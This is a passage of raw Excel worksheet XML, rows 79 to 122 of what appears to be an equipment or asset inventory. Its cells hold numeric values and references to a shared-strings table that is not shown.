      <c r="J79" s="100">
        <v>23000</v>
      </c>
      <c r="K79" s="99">
        <v>8096</v>
      </c>
      <c r="L79" s="239" t="s">
        <v>453</v>
      </c>
      <c r="M79" s="225"/>
    </row>
    <row r="80" s="210" customFormat="1" ht="14.25" customHeight="1" spans="2:13">
      <c r="B80" s="88">
        <v>73</v>
      </c>
      <c r="C80" s="237" t="s">
        <v>454</v>
      </c>
      <c r="D80" s="238" t="s">
        <v>455</v>
      </c>
      <c r="E80" s="237" t="s">
        <v>456</v>
      </c>
      <c r="F80" s="88"/>
      <c r="G80" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H80" s="11">
        <v>2</v>
      </c>
      <c r="I80" s="237" t="s">
        <v>457</v>
      </c>
      <c r="J80" s="100">
        <v>46600</v>
      </c>
      <c r="K80" s="99">
        <v>7728</v>
      </c>
      <c r="L80" s="239" t="s">
        <v>458</v>
      </c>
      <c r="M80" s="225"/>
    </row>
    <row r="81" ht="14.25" customHeight="1" spans="2:13">
      <c r="B81" s="88">
        <v>74</v>
      </c>
      <c r="C81" s="237" t="s">
        <v>459</v>
      </c>
      <c r="D81" s="238" t="s">
        <v>450</v>
      </c>
      <c r="E81" s="237" t="s">
        <v>460</v>
      </c>
      <c r="F81" s="17"/>
      <c r="G81" s="16" t="s">
        <v>461</v>
      </c>
      <c r="H81" s="11">
        <v>1</v>
      </c>
      <c r="I81" s="237" t="s">
        <v>462</v>
      </c>
      <c r="J81" s="100">
        <v>27350.43</v>
      </c>
      <c r="K81" s="99">
        <v>9800</v>
      </c>
      <c r="L81" s="96" t="s">
        <v>463</v>
      </c>
      <c r="M81" s="225"/>
    </row>
    <row r="82" ht="14.25" customHeight="1" spans="2:13">
      <c r="B82" s="88">
        <v>75</v>
      </c>
      <c r="C82" s="237" t="s">
        <v>464</v>
      </c>
      <c r="D82" s="238" t="s">
        <v>465</v>
      </c>
      <c r="E82" s="237" t="s">
        <v>309</v>
      </c>
      <c r="F82" s="17"/>
      <c r="G82" s="11" t="s">
        <v>466</v>
      </c>
      <c r="H82" s="16">
        <v>1</v>
      </c>
      <c r="I82" s="237" t="s">
        <v>467</v>
      </c>
      <c r="J82" s="100">
        <v>100000</v>
      </c>
      <c r="K82" s="99">
        <v>22400</v>
      </c>
      <c r="L82" s="96" t="s">
        <v>468</v>
      </c>
      <c r="M82" s="225"/>
    </row>
    <row r="83" ht="14.25" customHeight="1" spans="2:13">
      <c r="B83" s="88">
        <v>76</v>
      </c>
      <c r="C83" s="237" t="s">
        <v>469</v>
      </c>
      <c r="D83" s="238" t="s">
        <v>470</v>
      </c>
      <c r="E83" s="238" t="s">
        <v>471</v>
      </c>
      <c r="F83" s="14"/>
      <c r="G83" s="11" t="s">
        <v>466</v>
      </c>
      <c r="H83" s="11">
        <v>1</v>
      </c>
      <c r="I83" s="237" t="s">
        <v>472</v>
      </c>
      <c r="J83" s="91">
        <v>220000</v>
      </c>
      <c r="K83" s="99">
        <v>77440</v>
      </c>
      <c r="L83" s="238" t="s">
        <v>473</v>
      </c>
      <c r="M83" s="225"/>
    </row>
    <row r="84" ht="14.25" customHeight="1" spans="2:13">
      <c r="B84" s="88">
        <v>77</v>
      </c>
      <c r="C84" s="237" t="s">
        <v>474</v>
      </c>
      <c r="D84" s="238" t="s">
        <v>475</v>
      </c>
      <c r="E84" s="238" t="s">
        <v>476</v>
      </c>
      <c r="F84" s="9" t="s">
        <v>477</v>
      </c>
      <c r="G84" s="11" t="s">
        <v>223</v>
      </c>
      <c r="H84" s="11">
        <v>4</v>
      </c>
      <c r="I84" s="237" t="s">
        <v>478</v>
      </c>
      <c r="J84" s="91">
        <v>12820.51</v>
      </c>
      <c r="K84" s="99">
        <v>4608</v>
      </c>
      <c r="L84" s="238" t="s">
        <v>479</v>
      </c>
      <c r="M84" s="225"/>
    </row>
    <row r="85" ht="14.25" customHeight="1" spans="2:13">
      <c r="B85" s="88">
        <v>78</v>
      </c>
      <c r="C85" s="237" t="s">
        <v>480</v>
      </c>
      <c r="D85" s="238" t="s">
        <v>481</v>
      </c>
      <c r="E85" s="238" t="s">
        <v>482</v>
      </c>
      <c r="F85" s="14"/>
      <c r="G85" s="11" t="s">
        <v>223</v>
      </c>
      <c r="H85" s="11">
        <v>2</v>
      </c>
      <c r="I85" s="237" t="s">
        <v>483</v>
      </c>
      <c r="J85" s="91">
        <v>62393.16</v>
      </c>
      <c r="K85" s="99">
        <v>94080</v>
      </c>
      <c r="L85" s="238" t="s">
        <v>484</v>
      </c>
      <c r="M85" s="225"/>
    </row>
    <row r="86" ht="14.25" customHeight="1" spans="2:13">
      <c r="B86" s="88">
        <v>79</v>
      </c>
      <c r="C86" s="11"/>
      <c r="D86" s="10" t="s">
        <v>485</v>
      </c>
      <c r="E86" s="10" t="s">
        <v>486</v>
      </c>
      <c r="F86" s="9" t="s">
        <v>429</v>
      </c>
      <c r="G86" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H86" s="11">
        <v>1</v>
      </c>
      <c r="I86" s="11">
        <v>1992</v>
      </c>
      <c r="J86" s="91"/>
      <c r="K86" s="99">
        <v>720</v>
      </c>
      <c r="L86" s="10" t="s">
        <v>230</v>
      </c>
      <c r="M86" s="225"/>
    </row>
    <row r="87" ht="14.25" customHeight="1" spans="2:13">
      <c r="B87" s="88">
        <v>80</v>
      </c>
      <c r="C87" s="11"/>
      <c r="D87" s="10" t="s">
        <v>487</v>
      </c>
      <c r="E87" s="10" t="s">
        <v>488</v>
      </c>
      <c r="F87" s="9" t="s">
        <v>489</v>
      </c>
      <c r="G87" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H87" s="11">
        <v>1</v>
      </c>
      <c r="I87" s="11">
        <v>2006.8</v>
      </c>
      <c r="J87" s="91"/>
      <c r="K87" s="99">
        <v>18900</v>
      </c>
      <c r="L87" s="10" t="s">
        <v>230</v>
      </c>
      <c r="M87" s="225"/>
    </row>
    <row r="88" ht="14.25" customHeight="1" spans="2:13">
      <c r="B88" s="88">
        <v>81</v>
      </c>
      <c r="C88" s="11"/>
      <c r="D88" s="10" t="s">
        <v>487</v>
      </c>
      <c r="E88" s="10" t="s">
        <v>490</v>
      </c>
      <c r="F88" s="9" t="s">
        <v>489</v>
      </c>
      <c r="G88" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H88" s="11">
        <v>2</v>
      </c>
      <c r="I88" s="11">
        <v>1992</v>
      </c>
      <c r="J88" s="91"/>
      <c r="K88" s="99">
        <v>2800</v>
      </c>
      <c r="L88" s="10" t="s">
        <v>230</v>
      </c>
      <c r="M88" s="225"/>
    </row>
    <row r="89" ht="14.25" customHeight="1" spans="2:13">
      <c r="B89" s="88">
        <v>82</v>
      </c>
      <c r="C89" s="11"/>
      <c r="D89" s="10" t="s">
        <v>491</v>
      </c>
      <c r="E89" s="10" t="s">
        <v>492</v>
      </c>
      <c r="F89" s="9" t="s">
        <v>429</v>
      </c>
      <c r="G89" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H89" s="11">
        <v>2</v>
      </c>
      <c r="I89" s="11">
        <v>1992</v>
      </c>
      <c r="J89" s="91"/>
      <c r="K89" s="99">
        <v>1600</v>
      </c>
      <c r="L89" s="10" t="s">
        <v>230</v>
      </c>
      <c r="M89" s="225"/>
    </row>
    <row r="90" ht="14.25" customHeight="1" spans="2:13">
      <c r="B90" s="88">
        <v>83</v>
      </c>
      <c r="C90" s="11"/>
      <c r="D90" s="10" t="s">
        <v>493</v>
      </c>
      <c r="E90" s="10" t="s">
        <v>494</v>
      </c>
      <c r="F90" s="9" t="s">
        <v>495</v>
      </c>
      <c r="G90" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H90" s="11">
        <v>1</v>
      </c>
      <c r="I90" s="11">
        <v>2006</v>
      </c>
      <c r="J90" s="91"/>
      <c r="K90" s="99">
        <v>2520</v>
      </c>
      <c r="L90" s="10" t="s">
        <v>230</v>
      </c>
      <c r="M90" s="225"/>
    </row>
    <row r="91" ht="14.25" customHeight="1" spans="2:13">
      <c r="B91" s="88">
        <v>84</v>
      </c>
      <c r="C91" s="11"/>
      <c r="D91" s="10" t="s">
        <v>493</v>
      </c>
      <c r="E91" s="10" t="s">
        <v>496</v>
      </c>
      <c r="F91" s="9" t="s">
        <v>497</v>
      </c>
      <c r="G91" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H91" s="11">
        <v>2</v>
      </c>
      <c r="I91" s="11">
        <v>1995</v>
      </c>
      <c r="J91" s="91"/>
      <c r="K91" s="99">
        <v>640</v>
      </c>
      <c r="L91" s="10" t="s">
        <v>230</v>
      </c>
      <c r="M91" s="225"/>
    </row>
    <row r="92" ht="14.25" customHeight="1" spans="2:13">
      <c r="B92" s="88">
        <v>85</v>
      </c>
      <c r="C92" s="11"/>
      <c r="D92" s="10" t="s">
        <v>415</v>
      </c>
      <c r="E92" s="10" t="s">
        <v>498</v>
      </c>
      <c r="F92" s="9" t="s">
        <v>499</v>
      </c>
      <c r="G92" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H92" s="11">
        <v>1</v>
      </c>
      <c r="I92" s="11">
        <v>2005</v>
      </c>
      <c r="J92" s="91"/>
      <c r="K92" s="99">
        <v>1196</v>
      </c>
      <c r="L92" s="10" t="s">
        <v>230</v>
      </c>
      <c r="M92" s="225"/>
    </row>
    <row r="93" ht="14.25" customHeight="1" spans="2:13">
      <c r="B93" s="88">
        <v>86</v>
      </c>
      <c r="C93" s="11"/>
      <c r="D93" s="10" t="s">
        <v>500</v>
      </c>
      <c r="E93" s="10" t="s">
        <v>501</v>
      </c>
      <c r="F93" s="9" t="s">
        <v>502</v>
      </c>
      <c r="G93" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H93" s="11">
        <v>1</v>
      </c>
      <c r="I93" s="11">
        <v>1999</v>
      </c>
      <c r="J93" s="91"/>
      <c r="K93" s="99">
        <v>12880</v>
      </c>
      <c r="L93" s="10" t="s">
        <v>230</v>
      </c>
      <c r="M93" s="225"/>
    </row>
    <row r="94" ht="14.25" customHeight="1" spans="2:13">
      <c r="B94" s="88">
        <v>87</v>
      </c>
      <c r="C94" s="11"/>
      <c r="D94" s="10" t="s">
        <v>503</v>
      </c>
      <c r="E94" s="10" t="s">
        <v>504</v>
      </c>
      <c r="F94" s="9"/>
      <c r="G94" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H94" s="11">
        <v>1</v>
      </c>
      <c r="I94" s="11">
        <v>2005</v>
      </c>
      <c r="J94" s="91"/>
      <c r="K94" s="99">
        <v>8280</v>
      </c>
      <c r="L94" s="10" t="s">
        <v>230</v>
      </c>
      <c r="M94" s="225"/>
    </row>
    <row r="95" ht="14.25" customHeight="1" spans="2:13">
      <c r="B95" s="88">
        <v>88</v>
      </c>
      <c r="C95" s="11"/>
      <c r="D95" s="10" t="s">
        <v>505</v>
      </c>
      <c r="E95" s="10" t="s">
        <v>506</v>
      </c>
      <c r="F95" s="9"/>
      <c r="G95" s="88" t="s">
        <v>507</v>
      </c>
      <c r="H95" s="11">
        <v>1</v>
      </c>
      <c r="I95" s="11">
        <v>2011</v>
      </c>
      <c r="J95" s="91"/>
      <c r="K95" s="99">
        <v>1575</v>
      </c>
      <c r="L95" s="10" t="s">
        <v>230</v>
      </c>
      <c r="M95" s="225"/>
    </row>
    <row r="96" ht="14.25" customHeight="1" spans="2:13">
      <c r="B96" s="88">
        <v>89</v>
      </c>
      <c r="C96" s="11"/>
      <c r="D96" s="10" t="s">
        <v>508</v>
      </c>
      <c r="E96" s="10"/>
      <c r="F96" s="9"/>
      <c r="G96" s="88" t="s">
        <v>507</v>
      </c>
      <c r="H96" s="11">
        <v>1</v>
      </c>
      <c r="I96" s="11">
        <v>2005</v>
      </c>
      <c r="J96" s="91"/>
      <c r="K96" s="99">
        <v>77280</v>
      </c>
      <c r="L96" s="10" t="s">
        <v>230</v>
      </c>
      <c r="M96" s="225"/>
    </row>
    <row r="97" ht="14.25" customHeight="1" spans="2:13">
      <c r="B97" s="88">
        <v>90</v>
      </c>
      <c r="C97" s="11"/>
      <c r="D97" s="10" t="s">
        <v>427</v>
      </c>
      <c r="E97" s="10" t="s">
        <v>509</v>
      </c>
      <c r="F97" s="9" t="s">
        <v>429</v>
      </c>
      <c r="G97" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H97" s="11">
        <v>2</v>
      </c>
      <c r="I97" s="11">
        <v>1992</v>
      </c>
      <c r="J97" s="91"/>
      <c r="K97" s="99">
        <v>36000</v>
      </c>
      <c r="L97" s="10" t="s">
        <v>230</v>
      </c>
      <c r="M97" s="225"/>
    </row>
    <row r="98" s="211" customFormat="1" ht="14.25" customHeight="1" spans="1:13">
      <c r="A98" s="176"/>
      <c r="B98" s="88">
        <v>91</v>
      </c>
      <c r="C98" s="11"/>
      <c r="D98" s="10" t="s">
        <v>493</v>
      </c>
      <c r="E98" s="9" t="s">
        <v>510</v>
      </c>
      <c r="F98" s="9" t="s">
        <v>511</v>
      </c>
      <c r="G98" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H98" s="16">
        <v>5</v>
      </c>
      <c r="I98" s="16" t="s">
        <v>512</v>
      </c>
      <c r="J98" s="91"/>
      <c r="K98" s="99">
        <v>14400</v>
      </c>
      <c r="L98" s="10" t="s">
        <v>230</v>
      </c>
      <c r="M98" s="225"/>
    </row>
    <row r="99" ht="14.25" customHeight="1" spans="2:13">
      <c r="B99" s="88">
        <v>92</v>
      </c>
      <c r="C99" s="11"/>
      <c r="D99" s="10" t="s">
        <v>334</v>
      </c>
      <c r="E99" s="9" t="s">
        <v>513</v>
      </c>
      <c r="F99" s="9"/>
      <c r="G99" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H99" s="16">
        <v>1</v>
      </c>
      <c r="I99" s="16"/>
      <c r="J99" s="91"/>
      <c r="K99" s="99">
        <v>12480</v>
      </c>
      <c r="L99" s="10" t="s">
        <v>230</v>
      </c>
      <c r="M99" s="225"/>
    </row>
    <row r="100" s="212" customFormat="1" ht="14.25" customHeight="1" spans="1:13">
      <c r="A100" s="176"/>
      <c r="B100" s="88">
        <v>93</v>
      </c>
      <c r="C100" s="11"/>
      <c r="D100" s="10" t="s">
        <v>514</v>
      </c>
      <c r="E100" s="9"/>
      <c r="F100" s="9" t="s">
        <v>499</v>
      </c>
      <c r="G100" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H100" s="16">
        <v>1</v>
      </c>
      <c r="I100" s="16"/>
      <c r="J100" s="91"/>
      <c r="K100" s="99">
        <v>58240</v>
      </c>
      <c r="L100" s="10"/>
      <c r="M100" s="225"/>
    </row>
    <row r="101" ht="14.25" customHeight="1" spans="2:13">
      <c r="B101" s="88">
        <v>94</v>
      </c>
      <c r="C101" s="11"/>
      <c r="D101" s="10" t="s">
        <v>515</v>
      </c>
      <c r="E101" s="9" t="s">
        <v>516</v>
      </c>
      <c r="F101" s="9"/>
      <c r="G101" s="88" t="s">
        <v>507</v>
      </c>
      <c r="H101" s="16">
        <v>2</v>
      </c>
      <c r="I101" s="16">
        <v>2015</v>
      </c>
      <c r="J101" s="91"/>
      <c r="K101" s="99">
        <v>39900</v>
      </c>
      <c r="L101" s="10" t="s">
        <v>230</v>
      </c>
      <c r="M101" s="225"/>
    </row>
    <row r="102" ht="14.25" customHeight="1" spans="2:13">
      <c r="B102" s="88">
        <v>95</v>
      </c>
      <c r="C102" s="11"/>
      <c r="D102" s="10" t="s">
        <v>517</v>
      </c>
      <c r="E102" s="9" t="s">
        <v>518</v>
      </c>
      <c r="F102" s="9"/>
      <c r="G102" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H102" s="16">
        <v>1</v>
      </c>
      <c r="I102" s="16">
        <v>1992</v>
      </c>
      <c r="J102" s="91"/>
      <c r="K102" s="99">
        <v>4800</v>
      </c>
      <c r="L102" s="10" t="s">
        <v>230</v>
      </c>
      <c r="M102" s="225"/>
    </row>
    <row r="103" ht="14.25" customHeight="1" spans="2:13">
      <c r="B103" s="226" t="s">
        <v>519</v>
      </c>
      <c r="C103" s="227"/>
      <c r="D103" s="228"/>
      <c r="E103" s="10"/>
      <c r="F103" s="14"/>
      <c r="G103" s="11"/>
      <c r="H103" s="11"/>
      <c r="I103" s="11"/>
      <c r="J103" s="91"/>
      <c r="K103" s="99">
        <v>0</v>
      </c>
      <c r="L103" s="10"/>
      <c r="M103" s="225"/>
    </row>
    <row r="104" ht="14.25" customHeight="1" spans="2:13">
      <c r="B104" s="16">
        <v>96</v>
      </c>
      <c r="C104" s="237" t="s">
        <v>520</v>
      </c>
      <c r="D104" s="238" t="s">
        <v>521</v>
      </c>
      <c r="E104" s="9"/>
      <c r="F104" s="17"/>
      <c r="G104" s="11" t="s">
        <v>223</v>
      </c>
      <c r="H104" s="11">
        <v>1</v>
      </c>
      <c r="I104" s="237" t="s">
        <v>522</v>
      </c>
      <c r="J104" s="100">
        <v>580000</v>
      </c>
      <c r="K104" s="99">
        <v>125440</v>
      </c>
      <c r="L104" s="239" t="s">
        <v>523</v>
      </c>
      <c r="M104" s="225"/>
    </row>
    <row r="105" ht="14.25" customHeight="1" spans="2:13">
      <c r="B105" s="11">
        <v>97</v>
      </c>
      <c r="C105" s="237" t="s">
        <v>524</v>
      </c>
      <c r="D105" s="238" t="s">
        <v>525</v>
      </c>
      <c r="E105" s="238" t="s">
        <v>526</v>
      </c>
      <c r="F105" s="9"/>
      <c r="G105" s="11" t="s">
        <v>507</v>
      </c>
      <c r="H105" s="11">
        <v>2</v>
      </c>
      <c r="I105" s="237" t="s">
        <v>522</v>
      </c>
      <c r="J105" s="91">
        <v>463000</v>
      </c>
      <c r="K105" s="99">
        <v>201600</v>
      </c>
      <c r="L105" s="238" t="s">
        <v>523</v>
      </c>
      <c r="M105" s="225"/>
    </row>
    <row r="106" ht="14.25" customHeight="1" spans="1:13">
      <c r="A106" s="175"/>
      <c r="B106" s="16">
        <v>98</v>
      </c>
      <c r="C106" s="237" t="s">
        <v>527</v>
      </c>
      <c r="D106" s="238" t="s">
        <v>324</v>
      </c>
      <c r="E106" s="237" t="s">
        <v>528</v>
      </c>
      <c r="F106" s="17"/>
      <c r="G106" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H106" s="11">
        <v>1</v>
      </c>
      <c r="I106" s="237" t="s">
        <v>522</v>
      </c>
      <c r="J106" s="100">
        <v>6000</v>
      </c>
      <c r="K106" s="99">
        <v>1120</v>
      </c>
      <c r="L106" s="239" t="s">
        <v>523</v>
      </c>
      <c r="M106" s="225"/>
    </row>
    <row r="107" ht="14.25" customHeight="1" spans="2:13">
      <c r="B107" s="11">
        <v>99</v>
      </c>
      <c r="C107" s="237" t="s">
        <v>529</v>
      </c>
      <c r="D107" s="238" t="s">
        <v>514</v>
      </c>
      <c r="E107" s="237" t="s">
        <v>530</v>
      </c>
      <c r="F107" s="17"/>
      <c r="G107" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H107" s="11">
        <v>1</v>
      </c>
      <c r="I107" s="237" t="s">
        <v>522</v>
      </c>
      <c r="J107" s="100">
        <v>176000</v>
      </c>
      <c r="K107" s="99">
        <v>35840</v>
      </c>
      <c r="L107" s="239" t="s">
        <v>523</v>
      </c>
      <c r="M107" s="225"/>
    </row>
    <row r="108" ht="14.25" customHeight="1" spans="2:13">
      <c r="B108" s="16">
        <v>100</v>
      </c>
      <c r="C108" s="237" t="s">
        <v>531</v>
      </c>
      <c r="D108" s="238" t="s">
        <v>532</v>
      </c>
      <c r="E108" s="237" t="s">
        <v>533</v>
      </c>
      <c r="F108" s="17"/>
      <c r="G108" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H108" s="11">
        <v>1</v>
      </c>
      <c r="I108" s="237" t="s">
        <v>534</v>
      </c>
      <c r="J108" s="100">
        <v>33800</v>
      </c>
      <c r="K108" s="99">
        <v>7571.2</v>
      </c>
      <c r="L108" s="239" t="s">
        <v>523</v>
      </c>
      <c r="M108" s="225"/>
    </row>
    <row r="109" s="175" customFormat="1" ht="14.25" customHeight="1" spans="1:13">
      <c r="A109" s="176"/>
      <c r="B109" s="11">
        <v>101</v>
      </c>
      <c r="C109" s="237" t="s">
        <v>535</v>
      </c>
      <c r="D109" s="238" t="s">
        <v>536</v>
      </c>
      <c r="E109" s="237" t="s">
        <v>537</v>
      </c>
      <c r="F109" s="201"/>
      <c r="G109" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H109" s="11">
        <v>1</v>
      </c>
      <c r="I109" s="237" t="s">
        <v>522</v>
      </c>
      <c r="J109" s="100">
        <v>45000</v>
      </c>
      <c r="K109" s="99">
        <v>0</v>
      </c>
      <c r="L109" s="239" t="s">
        <v>523</v>
      </c>
      <c r="M109" s="225"/>
    </row>
    <row r="110" ht="14.25" customHeight="1" spans="2:13">
      <c r="B110" s="16">
        <v>102</v>
      </c>
      <c r="C110" s="237" t="s">
        <v>538</v>
      </c>
      <c r="D110" s="238" t="s">
        <v>539</v>
      </c>
      <c r="E110" s="237" t="s">
        <v>540</v>
      </c>
      <c r="F110" s="17"/>
      <c r="G110" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H110" s="11">
        <v>1</v>
      </c>
      <c r="I110" s="237" t="s">
        <v>343</v>
      </c>
      <c r="J110" s="100">
        <v>7650</v>
      </c>
      <c r="K110" s="99">
        <v>1702.4</v>
      </c>
      <c r="L110" s="239" t="s">
        <v>523</v>
      </c>
      <c r="M110" s="225"/>
    </row>
    <row r="111" ht="14.25" customHeight="1" spans="2:13">
      <c r="B111" s="11">
        <v>103</v>
      </c>
      <c r="C111" s="237" t="s">
        <v>541</v>
      </c>
      <c r="D111" s="238" t="s">
        <v>542</v>
      </c>
      <c r="E111" s="237" t="s">
        <v>543</v>
      </c>
      <c r="F111" s="17"/>
      <c r="G111" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H111" s="11">
        <v>2</v>
      </c>
      <c r="I111" s="237" t="s">
        <v>343</v>
      </c>
      <c r="J111" s="100">
        <v>20000</v>
      </c>
      <c r="K111" s="99">
        <v>4480</v>
      </c>
      <c r="L111" s="239" t="s">
        <v>523</v>
      </c>
      <c r="M111" s="225"/>
    </row>
    <row r="112" ht="14.25" customHeight="1" spans="2:13">
      <c r="B112" s="16">
        <v>104</v>
      </c>
      <c r="C112" s="237" t="s">
        <v>544</v>
      </c>
      <c r="D112" s="238" t="s">
        <v>539</v>
      </c>
      <c r="E112" s="237" t="s">
        <v>316</v>
      </c>
      <c r="F112" s="17"/>
      <c r="G112" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H112" s="11">
        <v>3</v>
      </c>
      <c r="I112" s="237" t="s">
        <v>343</v>
      </c>
      <c r="J112" s="100">
        <v>22950</v>
      </c>
      <c r="K112" s="99">
        <v>4928</v>
      </c>
      <c r="L112" s="239" t="s">
        <v>523</v>
      </c>
      <c r="M112" s="225"/>
    </row>
    <row r="113" ht="14.25" customHeight="1" spans="2:13">
      <c r="B113" s="11">
        <v>105</v>
      </c>
      <c r="C113" s="237" t="s">
        <v>545</v>
      </c>
      <c r="D113" s="238" t="s">
        <v>539</v>
      </c>
      <c r="E113" s="237" t="s">
        <v>546</v>
      </c>
      <c r="F113" s="17"/>
      <c r="G113" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H113" s="11">
        <v>1</v>
      </c>
      <c r="I113" s="237" t="s">
        <v>343</v>
      </c>
      <c r="J113" s="100">
        <v>7650</v>
      </c>
      <c r="K113" s="99">
        <v>1702.4</v>
      </c>
      <c r="L113" s="239" t="s">
        <v>523</v>
      </c>
      <c r="M113" s="225"/>
    </row>
    <row r="114" ht="14.25" customHeight="1" spans="2:13">
      <c r="B114" s="16">
        <v>106</v>
      </c>
      <c r="C114" s="237" t="s">
        <v>547</v>
      </c>
      <c r="D114" s="238" t="s">
        <v>548</v>
      </c>
      <c r="E114" s="237" t="s">
        <v>549</v>
      </c>
      <c r="F114" s="17"/>
      <c r="G114" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H114" s="11">
        <v>2</v>
      </c>
      <c r="I114" s="237" t="s">
        <v>343</v>
      </c>
      <c r="J114" s="100">
        <v>15350</v>
      </c>
      <c r="K114" s="99">
        <v>3360</v>
      </c>
      <c r="L114" s="239" t="s">
        <v>523</v>
      </c>
      <c r="M114" s="225"/>
    </row>
    <row r="115" ht="14.25" customHeight="1" spans="2:13">
      <c r="B115" s="11">
        <v>107</v>
      </c>
      <c r="C115" s="237" t="s">
        <v>550</v>
      </c>
      <c r="D115" s="238" t="s">
        <v>331</v>
      </c>
      <c r="E115" s="237" t="s">
        <v>551</v>
      </c>
      <c r="F115" s="17"/>
      <c r="G115" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H115" s="11">
        <v>1</v>
      </c>
      <c r="I115" s="237" t="s">
        <v>343</v>
      </c>
      <c r="J115" s="100">
        <v>78000</v>
      </c>
      <c r="K115" s="99">
        <v>17472</v>
      </c>
      <c r="L115" s="239" t="s">
        <v>523</v>
      </c>
      <c r="M115" s="225"/>
    </row>
    <row r="116" ht="14.25" customHeight="1" spans="2:13">
      <c r="B116" s="16">
        <v>108</v>
      </c>
      <c r="C116" s="237" t="s">
        <v>552</v>
      </c>
      <c r="D116" s="238" t="s">
        <v>487</v>
      </c>
      <c r="E116" s="238" t="s">
        <v>488</v>
      </c>
      <c r="F116" s="14"/>
      <c r="G116" s="11" t="s">
        <v>223</v>
      </c>
      <c r="H116" s="11">
        <v>2</v>
      </c>
      <c r="I116" s="237" t="s">
        <v>343</v>
      </c>
      <c r="J116" s="91">
        <v>198000</v>
      </c>
      <c r="K116" s="99">
        <v>31360</v>
      </c>
      <c r="L116" s="238" t="s">
        <v>523</v>
      </c>
      <c r="M116" s="225"/>
    </row>
    <row r="117" ht="14.25" customHeight="1" spans="2:13">
      <c r="B117" s="11">
        <v>109</v>
      </c>
      <c r="C117" s="237" t="s">
        <v>553</v>
      </c>
      <c r="D117" s="238" t="s">
        <v>554</v>
      </c>
      <c r="E117" s="237" t="s">
        <v>555</v>
      </c>
      <c r="F117" s="11"/>
      <c r="G117" s="16" t="s">
        <v>466</v>
      </c>
      <c r="H117" s="16"/>
      <c r="I117" s="237" t="s">
        <v>556</v>
      </c>
      <c r="J117" s="100">
        <v>760000</v>
      </c>
      <c r="K117" s="99">
        <v>156800</v>
      </c>
      <c r="L117" s="239" t="s">
        <v>557</v>
      </c>
      <c r="M117" s="225"/>
    </row>
    <row r="118" ht="14.25" customHeight="1" spans="2:13">
      <c r="B118" s="16">
        <v>110</v>
      </c>
      <c r="C118" s="237" t="s">
        <v>558</v>
      </c>
      <c r="D118" s="238" t="s">
        <v>554</v>
      </c>
      <c r="E118" s="237" t="s">
        <v>555</v>
      </c>
      <c r="F118" s="11"/>
      <c r="G118" s="16" t="s">
        <v>466</v>
      </c>
      <c r="H118" s="16"/>
      <c r="I118" s="237" t="s">
        <v>556</v>
      </c>
      <c r="J118" s="100">
        <v>331000</v>
      </c>
      <c r="K118" s="99">
        <v>71680</v>
      </c>
      <c r="L118" s="239" t="s">
        <v>557</v>
      </c>
      <c r="M118" s="225"/>
    </row>
    <row r="119" ht="14.25" customHeight="1" spans="2:13">
      <c r="B119" s="11">
        <v>111</v>
      </c>
      <c r="C119" s="237" t="s">
        <v>559</v>
      </c>
      <c r="D119" s="238" t="s">
        <v>560</v>
      </c>
      <c r="E119" s="237" t="s">
        <v>561</v>
      </c>
      <c r="F119" s="11"/>
      <c r="G119" s="16" t="s">
        <v>466</v>
      </c>
      <c r="H119" s="16"/>
      <c r="I119" s="237" t="s">
        <v>556</v>
      </c>
      <c r="J119" s="100">
        <v>150000</v>
      </c>
      <c r="K119" s="99">
        <v>33600</v>
      </c>
      <c r="L119" s="239" t="s">
        <v>562</v>
      </c>
      <c r="M119" s="225"/>
    </row>
    <row r="120" ht="14.25" customHeight="1" spans="2:13">
      <c r="B120" s="16">
        <v>112</v>
      </c>
      <c r="C120" s="237" t="s">
        <v>563</v>
      </c>
      <c r="D120" s="238" t="s">
        <v>564</v>
      </c>
      <c r="E120" s="237" t="s">
        <v>565</v>
      </c>
      <c r="F120" s="17"/>
      <c r="G120" s="16" t="s">
        <v>466</v>
      </c>
      <c r="H120" s="11"/>
      <c r="I120" s="237" t="s">
        <v>556</v>
      </c>
      <c r="J120" s="100">
        <v>125000</v>
      </c>
      <c r="K120" s="99">
        <v>28000</v>
      </c>
      <c r="L120" s="239" t="s">
        <v>523</v>
      </c>
      <c r="M120" s="225"/>
    </row>
    <row r="121" ht="14.25" customHeight="1" spans="2:13">
      <c r="B121" s="11">
        <v>113</v>
      </c>
      <c r="C121" s="237" t="s">
        <v>566</v>
      </c>
      <c r="D121" s="238" t="s">
        <v>567</v>
      </c>
      <c r="E121" s="237" t="s">
        <v>555</v>
      </c>
      <c r="F121" s="17"/>
      <c r="G121" s="16" t="s">
        <v>466</v>
      </c>
      <c r="H121" s="11"/>
      <c r="I121" s="237" t="s">
        <v>556</v>
      </c>
      <c r="J121" s="100">
        <v>250000</v>
      </c>
      <c r="K121" s="99">
        <v>56000</v>
      </c>
      <c r="L121" s="239" t="s">
        <v>523</v>
      </c>
      <c r="M121" s="225"/>
    </row>
    <row r="122" ht="14.25" customHeight="1" spans="2:13">
      <c r="B122" s="16">
        <v>114</v>
      </c>
      <c r="C122" s="237" t="s">
        <v>568</v>
      </c>
      <c r="D122" s="238" t="s">
        <v>569</v>
      </c>
      <c r="E122" s="237" t="s">
        <v>561</v>
      </c>
      <c r="F122" s="17"/>
      <c r="G122" s="16" t="s">
        <v>466</v>
      </c>
      <c r="H122" s="11"/>
      <c r="I122" s="237" t="s">
        <v>556</v>
      </c>
      <c r="J122" s="100">
        <v>90000</v>
      </c>
